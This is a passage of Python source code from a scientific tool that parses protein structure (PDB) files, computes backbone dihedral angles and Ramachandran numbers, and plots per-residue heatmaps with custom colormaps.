[sheet_end, sheet[2], polyproline[2]], [polyproline_end, polyproline[2], bc[2]], [1, bc[2],bc[2]]] \n } \n# this cdict is not normalized from 0 to 1, which is required for the line following the \"for\" loop.\nminpos = False\nmaxpos = False\nfor color in list(cdict.keys()):\n\tfor i in range(len(cdict[color])):\n\t\tif minpos == False:\n\t\t\tminpos = cdict[color][i][0]\n\t\tif maxpos == False:\n\t\t\tmaxpos = cdict[color][i][0]\n\t\tif minpos > cdict[color][i][0]:\n\t\t\tminpos = cdict[color][i][0]\n\t\tif maxpos < cdict[color][i][0]:\n\t\t\tmaxpos = cdict[color][i][0]\nfor color in list(cdict.keys()):\n\tfor i in range(len(cdict[color])):\n\t\tcdict[color][i][0] = float(cdict[color][i][0]-minpos)/(maxpos-minpos)\ncmap = LinearSegmentedColormap('SecondaryStructureFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n\n\n#rcode_cmap = plt.get_cmap('Chirality')\n#rcode_cmap = plt.get_cmap('Chirality_r')\nrcode_cmap = plt.get_cmap('ChiralityFourColor')\n#rcode_cmap = plt.get_cmap('ChiralityFourColor_r')\n#rcode_cmap = plt.get_cmap('SecondaryStructure')\n#rcode_cmap = plt.get_cmap('SecondaryStructureFourColor')\n\n\n# ===================================================================================\n\n# Simple smoothing function\ndef median_filter(vals,nearest_neighbors=1):\n\tnew_vals = []\n\tlen_vals = len(vals)\n\tfor i in range(len_vals):\n\t\tval = vals[i]\n\t\tif i-nearest_neighbors >= 0 and i+nearest_neighbors < len_vals:\n\t\t\tval = np.median(vals[i-nearest_neighbors:i+nearest_neighbors+1])\n\t\tnew_vals.append(val)\n\treturn new_vals\n#\n\ndef calculate_dihedral_angle(p):\n\tb = p[:-1] - p[1:]\n\tb[0] *= -1\n\tv = np.array( [ v - (v.dot(b[1])/b[1].dot(b[1])) * b[1] for v in [b[0], b[2]] ] )\n\t# Normalize vectors\n\tv /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1,1)\n\tb1 = b[1] / np.linalg.norm(b[1])\n\tx = np.dot(v[0], v[1])\n\tm = np.cross(v[0], b1)\n\ty = np.dot(m, v[1])\n\td = np.degrees(np.arctan2( y, x ))\n\treturn d\n\naa_three_to_one = {'CYS': 'C', 'ASP': 'D', 'SER': 'S', 'GLN': 'Q', 'LYS': 'K',\n 'ILE': 'I', 'PRO': 'P', 'THR': 'T', 'PHE': 'F', 'ASN': 'N', \n 'GLY': 'G', 'HIS': 'H', 'LEU': 'L', 'ARG': 'R', 'TRP': 'W', \n 'ALA': 'A', 'VAL':'V', 'GLU': 'E', 'TYR': 'Y', 'MET': 'M'}\n#\n\t\ndef read_pdb_biopython(fn,signed=0):\n\tp=PDB.PDBParser() #(PERMISSIVE=1)\n\tstructure=p.get_structure(fn[:-len(\".pdb\")], fn)\n\t#for model in structure:\n\t#\tprint [model.id]\n\tmodel_to_chain_to_resno_atom_to_vals = {}\n\t# structure (models) -> model -> chain -> residue -> atom\n\tfor model in structure:\n\t\tmodel_number = model.id\n\t\t#\n\t\tif not model_number in model_to_chain_to_resno_atom_to_vals:\n\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number] = {}\n\t\t#\n\t\tfor chain in model:\n\t\t\tsegname = chain.id\n\t\t\tif not segname in model_to_chain_to_resno_atom_to_vals[model_number]:\n\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname] = {}\n\t\t\t\n\t\t\tfor residue in chain:\n\t\t\t\tresname = residue.resname\n\t\t\t\tresno = residue.id[1]\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\ti = resno\n\t\t\t\tim = i-1\n\t\t\t\tip = i+1\n\t\t\t\t\n\t\t\t\tneighbors_found = 1\n\t\t\t\ttry:\n\t\t\t\t\ta = structure[model_number][segname][im][\"C\"].coord\n\t\t\t\t\tb = structure[model_number][segname][i][\"N\"].coord\n\t\t\t\t\tc = structure[model_number][segname][i][\"CA\"].coord\n\t\t\t\t\td = structure[model_number][segname][i][\"C\"].coord\n\t\t\t\t\te = structure[model_number][segname][ip][\"N\"].coord\n\t\t\t\t\t\n\t\t\t\t\tif not resno in model_to_chain_to_resno_atom_to_vals[model_number][segname]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno] = {}\n\t\t\t\t\t\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"resname\"] = resname\n\t\t\t\t\tsingleaa = resname\n\t\t\t\t\tif resname in aa_three_to_one:\n\t\t\t\t\t\tsingleaa = aa_three_to_one[resname]\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"aa\"] = singleaa\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"n\"] = b\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"ca\"] = c\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"c\"] = d\n\t\t\t\t\n\t\t\t\texcept:\n\t\t\t\t\tneighbors_found = 0\n\t\t\t\t\n\t\t\t\tif neighbors_found: #im in resids and ip in resids:\n\t\t\t\t\tphi = calculate_dihedral_angle(np.array([a,b,c,d]))\n\t\t\t\t\tpsi = calculate_dihedral_angle(np.array([b,c,d,e]))\n\t\t\t\t\trho = normalized_ramachandran_number(phi,psi,signed)\n\t\t\t\t\t#\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"phi\"] = phi\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"psi\"] = psi\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][i][\"R\"] = rho\n\t\t\t\t\t#\n\t\t\t\t#\n\t\t\t#\n\t\t#\n\t\tif not len(model_to_chain_to_resno_atom_to_vals[model_number]):\n\t\t\tdel model_to_chain_to_resno_atom_to_vals[model_number]\n\t#\n\t\n\t\n\treturn model_to_chain_to_resno_atom_to_vals\n\n# OLD VERSION (IN HOUSE). IT IS FASTER THAN THE CURRENT \"read_pdb\", WHICH IS BIOPDB RUN, BUT IT IS NOT \n# AS WELL TESTED.\ndef read_pdb_inhouse(fn,signed=0):\n\t\"\"\"\n\tATOM 10 1H LYS A 1 0.763 3.548 -0.564\n\tATOM 11 2H LYS A 1 1.654 2.664 0.488\n\tATOM 482 N PRO A 61 27.194 -5.761 14.684 1.00 9.09 N \n\tATOM 2 CA BLYSX 1 -77.937 -26.325 6.934 1.00 0.00 U1 \n\tATOM 3 CB BLYSX 1 -79.612 -24.499 7.194 1.00 0.00 U1 \n\tATOM 4 CE BLYSX 1 -80.894 -24.467 8.039 1.00 0.00 U1 \n\tATOM 5 NZ BLYSX 1 -80.687 -24.160 9.434 1.00 0.00 U1 \n\tATOM 2 HT1 MET U 1 0.208 0.762 -12.141 0.00 0.00 UBIQ \n\tATOM 3 HT2 MET U 1 -1.052 -0.551 -12.281 0.00 0.00 UBIQ \n\t | | | | | | | | |\n\t atomno | | | | x y z segname\n\t atom type | | | (CHAIN)\n\t restype | 3resno\n\t chainID\n\t\"\"\"\n\t\n\tf = open(fn,\"r\")\n\tpdbblock = f.read()\n\tf.close()\n\t\n\tgetlines = re.compile(r\"ATOM\\s+(?P\\d+)\\s+(?P\\S+)\\s+.(?P...)..\\s+(?P\\d+)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*).{17}(?P.{5})\",re.M)\n\tgetlines_short = re.compile(r\"ATOM\\s+(?P\\d+)\\s+(?P\\S+)\\s+(?P...).(?P.)\\s+(?P\\d+)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\\s+(?P\\-*\\d+\\.*\\d*)\",re.M)\n\t\n\tresnos = []\n\t#models = pdbblock.split(\"\\nEND\\n\")\n\tmodels = re.split(r\"\\nEND|\\nMODEL|\\nTER\",pdbblock)\n\t\n\tmodel_number = 0\n\tmodel_to_chain_to_resno_atom_to_vals = {}\n\t# structure (models) -> model -> chain -> residue -> atom\n\t\n\t#t0 = time.time()\n\t#print \"#\\treading...\",\n\tfor model_index in range(len(models)):\n\t\tmodel = models[model_index]\n\t\tif len(model.rstrip()) > 1:\n\t\t\tmodel_number+=1\n\t\t\tif not model_number in model_to_chain_to_resno_atom_to_vals:\n\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number] = {}\n\t\t\t\n\t\t\tsegname_exists = 1\n\t\t\tcurrentlines = getlines.finditer(model)\n\t\t\tif not getlines.search(model):\n\t\t\t\tcurrentlines = getlines_short.finditer(model)\n\t\t\t\tsegname_exists = 0\n\t\t\t\n\t\t\tfor i in currentlines:\n\t\t\t\tvals = i.groupdict()\n\t\t\t\tatomtype = vals[\"atomtype\"] #line[11:17].lstrip().rstrip()\n\t\t\t\t\n\t\t\t\tif atomtype==\"CA\" or atomtype ==\"N\" or atomtype ==\"C\":\n\t\t\t\t\tresno = int(vals[\"resno\"]) #int(resno) #int(line[22:26].lstrip().rstrip())\n\t\t\t\t\txyz = np.array([float(vals[\"x\"]),float(vals[\"y\"]),float(vals[\"z\"])])\n\t\t\t\t\t\n\t\t\t\t\tsegname = \"A\"\n\t\t\t\t\tif segname_exists:\n\t\t\t\t\t\tsegname = vals[\"segname\"].lstrip().rstrip()\n\t\t\t\t\t\n\t\t\t\t\tif not segname in model_to_chain_to_resno_atom_to_vals[model_number]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname] = {}\n\t\t\t\t\t\n\t\t\t\t\tif not resno in model_to_chain_to_resno_atom_to_vals[model_number][segname]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno] = {}\n\t\t\t\t\t\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][atomtype.lower()] = xyz\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"resname\"] = vals[\"resname\"]\n\t\t\t\n\t\t\tif not len(model_to_chain_to_resno_atom_to_vals[model_number]):\n\t\t\t\tdel model_to_chain_to_resno_atom_to_vals[model_number]\n\t\t\t\tmodel_number-=1\n\t#\n\tfor model in sorted(model_to_chain_to_resno_atom_to_vals.keys()):\n\t\tfor chain in sorted(model_to_chain_to_resno_atom_to_vals[model].keys()):\n\t\t\tfor resno in sorted(model_to_chain_to_resno_atom_to_vals[model][chain].keys()):\n\t\t\t\ttriplet_found = 0\n\t\t\t\tif \"ca\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif \"n\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif \"c\" in model_to_chain_to_resno_atom_to_vals[model][chain][resno]:\n\t\t\t\t\ttriplet_found+=1\n\t\t\t\tif triplet_found == 3:\n\t\t\t\t\ti = resno\n\t\t\t\t\tim = i-1\n\t\t\t\t\tip = i+1\n\t\t\t\t\t\n\t\t\t\t\tneighbors_found = 0\n\t\t\t\t\tif im in model_to_chain_to_resno_atom_to_vals[model][chain]:\n\t\t\t\t\t\tif \"c\" in model_to_chain_to_resno_atom_to_vals[model][chain][im]:\n\t\t\t\t\t\t\tneighbors_found += 1\n\t\t\t\t\tif ip in model_to_chain_to_resno_atom_to_vals[model][chain]:\n\t\t\t\t\t\tif \"n\" in model_to_chain_to_resno_atom_to_vals[model][chain][ip]:\n\t\t\t\t\t\t\tneighbors_found += 1\n\t\t\t\t\t\n\t\t\t\t\tif neighbors_found == 2: #im in resids and ip in resids:\n\t\t\t\t\t\ta = model_to_chain_to_resno_atom_to_vals[model][chain][im][\"c\"] # resno_to_coordC[before]\n\t\t\t\t\t\tb = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"n\"] # resno_to_coordN[current]\n\t\t\t\t\t\tc = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"ca\"] #resno_to_coordCA[current]\n\t\t\t\t\t\td = model_to_chain_to_resno_atom_to_vals[model][chain][i][\"c\"] # resno_to_coordC[current]\n\t\t\t\t\t\te = model_to_chain_to_resno_atom_to_vals[model][chain][ip][\"n\"] # resno_to_coordN[after]\n\t\t\t\t\t\t\n\t\t\t\t\t\tphi = calculate_dihedral_angle(np.array([a,b,c,d]))\n\t\t\t\t\t\tpsi = calculate_dihedral_angle(np.array([b,c,d,e]))\n\t\t\t\t\t\trho = normalized_ramachandran_number(phi,psi,signed)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"phi\"] = phi\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"psi\"] = psi\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model][chain][i][\"R\"] = rho\n\t#\n\treturn model_to_chain_to_resno_atom_to_vals\n#\n\ndef check_pdb(fn):\n\t\"\"\"\n\tATOM 10 1H LYS A 1 0.763 3.548 -0.564\n\tATOM 11 2H LYS A 1 1.654 2.664 0.488\n\tATOM 482 N PRO A 61 27.194 -5.761 14.684 1.00 9.09 N \n\tATOM 2 CA BLYSX 1 -77.937 -26.325 6.934 1.00 0.00 U1 \n\tATOM 3 CB BLYSX 1 -79.612 -24.499 7.194 1.00 0.00 U1 \n\tATOM 4 CE BLYSX 1 -80.894 -24.467 8.039 1.00 0.00 U1 \n\tATOM 5 NZ BLYSX 1 -80.687 -24.160 9.434 1.00 0.00 U1 \n\tATOM 2 HT1 MET U 1 0.208 0.762 -12.141 0.00 0.00 UBIQ \n\tATOM 3 HT2 MET U 1 -1.052 -0.551 -12.281 0.00 0.00 UBIQ \n\t | | | | | | | | |\n\t atomno | | | | x y z segname\n\t atom type | | | (CHAIN)\n\t restype | resno\n\t chainID\n\t\"\"\"\n\t\n\tchainIDindex = 21\n\tchainIDindexMinusOne = chainIDindex-1\n\tlenATOM = len(\"ATOM \")\n\t\n\tchainIDpossibilities = \"\"\n\tchainIDpossibilities+=string.uppercase # 'A' through 'Z'.\n\tfor i in range(10):\n\t\tchainIDpossibilities+=str(i)\n\tchainIDpossibilities+=string.lowercase # 'a' through 'z'.\n\tlenchainIDpossibilities = len(chainIDpossibilities)\n\tlargestchainIDindex = 0\n\t\n\tmade_changes = 0\n\tf = open(fn,\"r\")\n\tlines = f.readlines()\n\tf.close()\n\tpdb_is_possibly_problematic = 0\n\tsegname_to_chainID = {}\n\tfor i in range(len(lines)):\n\t\tif len(lines[i]) > 67:\n\t\t\tif lines[i][:lenATOM] == \"ATOM \":\n\t\t\t\tchainID = lines[i][chainIDindex].rstrip()\n\t\t\t\tchainIDspacebefore = lines[i][chainIDindexMinusOne].rstrip()\n\t\t\t\tif len(chainIDspacebefore): # This is because some CHARMM sidechains have four letters, and that trips biopython\n\t\t\t\t\tpdb_is_possibly_problematic = 1\n\t\t\t\t\n\t\t\t\tif len(chainID)==0 or chainID==\"X\": # CHARMM SOMETIMES SAVES THE CHAINID AS 'X' IRRESPECTIVE OF SEGNAME\n\t\t\t\t\tpdb_is_possibly_problematic = 1\n\t\t\t\t#\n\t\t\t#\n\t\t#\n\tif pdb_is_possibly_problematic:\n\t\treturn 0\n\telse:\n\t\treturn 1\n#\ndef read_pdb(fn,signed=0):\n\traw_pdb_data = False\n\tif biopython:\n\t\tif check_pdb(fn):\n\t\t\traw_pdb_data = read_pdb_biopython(fn,signed=signed)\n\t\telse:\n\t\t\traw_pdb_data = read_pdb_inhouse(fn,signed=signed)\n\telse:\n\t\traw_pdb_data = read_pdb_inhouse(fn,signed=signed)\n\t#\n\tmatrix_material = [['model','chain','resid','R']]\n\tfor model in list(raw_pdb_data.keys()):\n\t\tfor chain in list(raw_pdb_data[model].keys()):\n\t\t\tfor resid in list(raw_pdb_data[model][chain].keys()):\n\t\t\t\tR = False\n\t\t\t\tif 'R' in raw_pdb_data[model][chain][resid]:\n\t\t\t\t\tR = raw_pdb_data[model][chain][resid]['R']\n\t\t\t\tmatrix_material.append([int(model),chain,int(resid),R])\n\t\n\t# Creating a matrix that can be queriable later\n\tpdb_matrix = np.array(matrix_material,dtype='O')\n\treturn pdb_matrix\n#\n\n# From: https://stackoverflow.com/questions/7965743/how-can-i-set-the-aspect-ratio-in-matplotlib\ndef forceAspect(aspect,ax=False):\n\tif not ax: ax=plt.gca()\n\textent = plt.axis()\n\tax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)\n#\n\ndef write_image(fn_base):\n\tplt.savefig(fn_base+'.eps',dpi=200,bbox_inches='tight')\n\tplt.savefig(fn_base+'.png',dpi=200,bbox_inches='tight')\n\tif show: plt.show();\n#\n\ndef draw_xyz(X,Y,Z, ylim=False, cmap='Greys', xlabel=False,ylabel=False,zlabel=False,title=False,vmin=None,vmax=None):\n\t\n\taspect = 2.\n\tif len(set(X)) == 1:\n\t\t# Some structures have only one model, which is too thin, \n\t\t# so we add another row with everything else being identical \n\t\t# except that all new xs are skewed by 1\n\t\tX = list(X) + list(np.array(X)+1)\n\t\tY = list(Y) + list(Y)\n\t\tZ = list(Z) + list(Z)\n\t\t# Also, the aspect ratio needs to be reset, since we are dealing with only one column\n\t\taspect = .2\n\t#\n\t# Getting unique values for X\n\tsetX = sorted(set(X))\n\t# Getting unique values for Y \n\tsetY = sorted(set(Y))\n\t\n\t# Code that offsets the values\n\tif 1: \n\t\t# We want whole numbers to be situated at the middle of each column, not at the beginning and end\n\t\t# X\n\t\t# Getting the grid step size\n\t\txsteps = []\n\t\tfor i in range(1,len(setX)):\n\t\t\txsteps.append(setX[i]-setX[i-1])\n\t\txstep = np.median(xsteps)\n\t\t# Making the offset\n\t\tX = np.array(X)-xstep\n\t\t# Y\n\t\t# Getting the grid step size\n\t\tysteps = []\n\t\tfor i in range(1,len(setY)):\n\t\t\tysteps.append(setY[i]-setY[i-1])\n\t\tystep = np.median(ysteps)\n\t\t# Making the offset\n\t\tY = np.array(Y)-ystep\n\t\t\n\t\t# Resetting the sorted unique values\n\t\t# Getting unique values for X\n\t\tsetX = sorted(set(X))\n\t\t# Getting unique values for Y \n\t\tsetY = sorted(set(Y))\n\t\t\t\n\t\n\t#\n\t# A dictionary containing X values and their indices once ordered \n\tX_to_ix = dict([[setX[ix],ix] for ix in range(len(setX))])\n\t# Creating a new array of indices instead of values\n\tXix = [ X_to_ix[v] for v in X ]\n\t\n\t# A dictionary containing X values and their indices once ordered \n\tY_to_ix = dict([[setY[ix],ix] for ix in range(len(setY))])\n\t# Creating a new array of indices instead of values\n\tYix = [ Y_to_ix[v] for v in Y ]\n\t\n\t# Creating an empty array with the right dimensions\n\tz_array = np.zeros((len(setY),len(setX))) * np.nan\n\t# Setting values of Z based on their position in the matrix\n\tz_array[Yix, Xix] = Z\n\t\n\t# Initiating the figure\n\tax = plt.gca()\n\t# Drawing the main part of the figure\n\t\n\tim = plt.imshow(z_array,origin='lower',cmap=cmap,vmin=vmin,vmax=vmax,interpolation='nearest', extent=[min(X),max(X),min(Y),max(Y)])\n\t\n\t# create an axes on the right side of ax. The width of cax will be 5%\n\t# of ax and the padding between cax and ax will be fixed at 0.05 inch.\n\tcb = plt.colorbar(im,fraction=0.023, pad=0.04)\n\t[i.set_linewidth(1.5) for i in ax.spines.values()]\n\t\n\t# Setting labels\n\tif xlabel: plt.xlabel(xlabel, fontsize=15);\n\tif ylabel: plt.ylabel(ylabel, fontsize=15);\n\tif zlabel: cb.ax.set_title(zlabel, rotation=0,fontsize=15);\n\t\n\t# Setting title\n\tif title: plt.title(title,fontsize=16)\n\t\n\t# limiting y if specified\n\tif ylim: plt.ylim(ylim);\n\t\n\t# Setting the aspect ratio\n\tforceAspect(aspect,ax=ax)\n\t\n\t# Neatening things out\n\tplt.tight_layout()\n\t#\n\t# To see this graph and quit, uncomment the following:\n\t#plt.show(); exit();\n\treturn True\n#\n\n# Grouping each data by \ndef group_data_by(data,group_by=\"chain\",columns_to_return=['model','resid','R']):\n\t# Getting column indices for each column name\n\trx = {} # \"rx\" for Row indeX\n\t# Taking the first row and getting the column name and index\n\tfor col in data[0,:]:\n\t\trx[col] = list(data[0,:]).index(col)\n\t# \n\tgroup_by_values = sorted(set(data[1:,rx[group_by]]))\n\t#\n\tgrouped_data = {}\n\tfor filter_value in group_by_values:\n\t\tcurrent_data = data[np.where(data[:,rx[group_by]] == filter_value)]\n\t\tgrouped_data[filter_value] = []\n\t\tfor return_column in columns_to_return:\n\t\t\tgrouped_data[filter_value].append(current_data[:,rx[return_column]])\n\t#\t\n\treturn grouped_data\n#\n\n# This is the stand along program (used by __main__.py)\ndef main():\n\tcolortype = \"Chirality\" # can be SecondaryStructure\n\tglobal signed, show\n\tshow = 1\n\tif not \"-pdb\" in sys.argv:\n\t\tif \"-h\" in sys.argv or \"-help\" in sys.argv or \"--help\" in sys.argv:\n\t\t\tpass\n\t\telse:\n\t\t\tprint(\"Must provide '-pdb' parameter. Exiting.\")\n\t\t\texit(0)\n\t\n\ttarget_dir = False\n\tfor i in range(len(sys.argv)):\n\t\tif sys.argv[i] == \"-rmsd\":\n\t\t\tshowrmsd = 1\n\t\tif sys.argv[i] == \"-show\":\n\t\t\tshow = True\n\t\tif sys.argv[i] == \"-signed\":\n\t\t\tprint(\"Using the R number with range [-1,1]\")\n\t\t\tsigned = 1\n\t\t\trrange = [-1,1]\n\t\tif sys.argv[i] == \"-ss\":\n\t\t\tcolortype = \"SecondaryStructure\" # default: chirality\n\t\tif sys.argv[i] == \"-h\" or sys.argv[i] == \"-help\" or sys.argv[i] == \"--help\":\n\t\t\tprint(helpme)\n\t\t\texit(1)\n\t\tif sys.argv[i] == \"-pdb\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\tprint(helpme)\n\t\t\t\tprint(\"MUST PROVIDE PDB NAME.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tpdbfn = str(sys.argv[i+1])\n\t\t\t\tprint(\"# pdbfn set to:\",pdbfn)\n\t\tif sys.argv[i] == \"-target\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\tprint(helpme)\n\t\t\t\tprint(\"MUST PROVIDE TARGET DIR.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\ttarget_dir = str(sys.argv[i+1])\n\t\t\t\tif os.path.isdir(target_dir):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint('SPECIFIED TARGET DIR (%s) DOES NOT EXIST' %(target_dir))\n\t\t\t\tprint(\"# target directory set to:\",target_dir)\n\t\telif sys.argv[i] == \"-bins\":\n\t\t\tif len(sys.argv) <= i+1:\n\t\t\t\thelpme\n\t\t\t\tprint(\"When using '-bins', you must provide bin number. Exiting.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tif not sys.argv[i+1].isdigit():\n\t\t\t\t\tprint(helpme)\n\t\t\t\t\tprint(\"The -bin parameter must be a positive integer (provided: \"+str(sys.argv[i+1])+\") Exiting.\")\n\t\t\t\t\texit(0)\n\t\t\t\telse:\n\t\t\t\t\tbins = int(sys.argv[i+1])\n\t\t\t\t\tprint(\"# bins set to:\",bins)\n\t\t\t\t\tif bins == 0:\n\t\t\t\t\t\tprint(helpme)\n\t\t\t\t\t\tprint(\"Must have greater than 0 bins. Exiting.\")\n\t\t\t\t\t\texit(0)\n\t\n\tcolormap_name = colortype\n\tif signed:\n\t\tcolormap_name = colortype+'FourColor'\n\tprint(\"Using color map name:\",colormap_name)\n\trcode_cmap = plt.get_cmap(colormap_name)\n\t#rcode_cmap = plt.get_cmap(\"deletemeSigned\")\n\t\n\tpdbfn = os.path.abspath(pdbfn)\n\tpdbdir = os.path.dirname(pdbfn)\n\tpdbfilenames = []\n\t\n\tif os.path.isfile(pdbfn):\n\t\t# then this pathname leads to a FILE\n\t\t# ... so keep as is\n\t\tpdbfilenames = [pdbfn]\n\t\tname = re.split('[\\/\\.]',pdbfn)[-2]\n\telif os.path.isdir(pdbfn):\n\t\tpdbdir = pdbfn\n\t\tpdbfilenames = sorted(glob.glob(pdbdir+\"/*.pdb\"))\n\t\tname = re.split('[\\/\\.]',pdbfn)[-1]\n\telse:\n\t\tprint(helpme)\n\t\texit(\"Either filename or directory expected. Exiting.\")\n\t#\n\tif not target_dir:\n\t\ttarget_dir = pdbdir+\"/reports/\"\n\tif not os.path.isdir(target_dir):\n\t\tos.makedirs(target_dir)\n\t\t\n\t#NAME = os.path.basename(pdbfilenames[0])[:-len(\".pdb\")]\n\ttarget_base = target_dir.rstrip(\"/\")+\"/\"\n\t#\n\t\n\t# JUST \"CLEVERLY\" ARRANGING THE FILENAMES, IF WE HAVE A SET OF FILENAMES RATHER THAN ONE\n\t# (e.g., pdbfilenames = [something2part1,something1part2,something1part1,something10part1]\n\t# pdbfilenames.sort() this list to: [something1part1,something1part2,something2part1,something10part1]\n\tREXP = re.compile( r'\\d+' )\n\tdef key_function( s ): return list(map(int, re.findall(REXP, s )))\n\tpdbfilenames.sort( key=key_function)\n\t\n\tprint(\"# Parsing the PDB (structure) data\")\n\tstructure = np.array([])\n\tfor pdbfn in pdbfilenames:#[:10]:\n\t\t#print(pdbfn)\n\t\t# Check if the PDB has no subunit IDs, and then check if segnames exist (right most column)\n\t\t# and renaming the subunit IDs alphabetically and then numerically\n\t\t\n\t\t# READ PDB in the form of a matrix with columns ['model','chain','resid','R']\n\t\tlatest_structure = read_pdb(pdbfn,signed)\n\t\t\n\t\t\n\t\t# Getting column indices for each column name\n\t\trx = {} # \"rx\" for Row indeX\n\t\tfor c in latest_structure[0,:]:\n\t\t\trx[c] = list(latest_structure[0,:]).index(c)\n\t\t#\n\t\t\n\t\tsorted_models = sorted(list(set(latest_structure[1:,rx['model']])))\n\t\tcurrent_model_number = 0\n\t\toriginal_to_new_model_numbers = {}\n\t\tfor actual_model_number in sorted_models:\n\t\t\tcurrent_model_number += 1\n\t\t\toriginal_to_new_model_numbers[actual_model_number] = current_model_number\n\t\t#\n\t\t\n\t\t# Checking if we already have some structures loaded (then we have to offset the model numbers)\n\t\tif len(structure):\n\t\t\t#\n\t\t\tlargest_model_number = max(list(structure[1:,rx['model']]))\n\t\t\tfor m in list(original_to_new_model_numbers.keys()):\n\t\t\t\toriginal_to_new_model_numbers[m] = original_to_new_model_numbers[m] + largest_model_number\n\t\t\t#\n\t\t#\n\t\t# Resetting model numbers \n\t\tnew_model_numbers = [original_to_new_model_numbers[actual_model_number] for actual_model_number in latest_structure[1:,rx['model']]]\n\t\tlatest_structure[1:,rx['model']] = copy.deepcopy(new_model_numbers)\n\t\t#\t\n\t\t\n\t\tif len(structure):\n\t\t\t# Copying as structure\n\t\t\tstructure = np.append(structure,copy.deepcopy(latest_structure[1:]), axis=0)\n\t\telse:\n\t\t\t# Adding the current model to structure\n\t\t\tstructure = copy.deepcopy(latest_structure)\n\t\t#print(structure[:,rx['model']])\n\t\t#print(pdbfn)\n\t\t#input()\n\t#\n\tprint(\"\\t...done\")\n\t\n\t##########################################################################################################\n\t# READ PDB in the form of a matrix with columns\n\t#data = read_pdb(pdbfn)\n\tdata = structure\n\t# Getting only those values for the particular chain \n\tgrouped_data = group_data_by(data,group_by='chain', \n\t\t\t\t\t\tcolumns_to_return=['model','resid','R'])\n\t\n\tpdbfn = os.path.split(pdbfn)[-1][:-len('.pdb')]\n\t\n\tprint(\" ---- \\t---------\")\n\tprint(\" TEST \\tTEST NAME\")\n\tprint(\" ---- \\t---------\")\n\t\n\tvmin = 0; \n\tvmax = 1;\n\tss_cmap = 'SecondaryStructure'\n\tchirality_cmap = 'Chirality'\n\tif signed:\n\t\tvmin = -1; \n\t\tvmax = 1;\n\t\tss_cmap = ss_cmap + 'FourColor'\n\t\tchirality_cmap = chirality_cmap + 'FourColor'\n\t#\n\t\t\n\tprint(\" 1 \\tRamachandran number (PDB: %s)\"%(name))\n\t\n\t# setting the name of the colormap\n\tfor cmap in ['Greys',ss_cmap,chirality_cmap]: #, 'Chirality_r', 'SecondaryStructureHard']:\n\t\t# DRAWING A SINGLE GRAPH\n\t\tfor chain in list(grouped_data.keys()):\n\t\t\tfinal_name = name\n\t\t\tif len(chain.rstrip()):\n\t\t\t\tfinal_name+='-'+str(chain)\n\t\t\t\n\t\t\t# Getting the X,Y,Z values for each entry\n\t\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\t\n\t\t\tdraw_xyz(X = models , Y = residues , Z = Rs\n\t\t\t\t\t , xlabel ='Frame #', ylabel =\"Residue #\",zlabel ='$\\mathcal{R}$'\n\t\t\t\t\t , title='Per-residue $\\mathcal{R}$; CMAP: %s\\nPDB: %s' %(cmap,final_name)\n\t\t\t\t\t , cmap = cmap , vmin=vmin, vmax=vmax)\n\t\t\t#\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_r_%s' %(final_name,cmap)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t#\n\t# Getting only those values for the particular chain \n\tprint(\" 2. \\tHistogram (PDB: 1xqq)\")\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t# Bundling the three lists into one 2d array\n\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t# Getting all R values, model by model\n\t\tfor m in 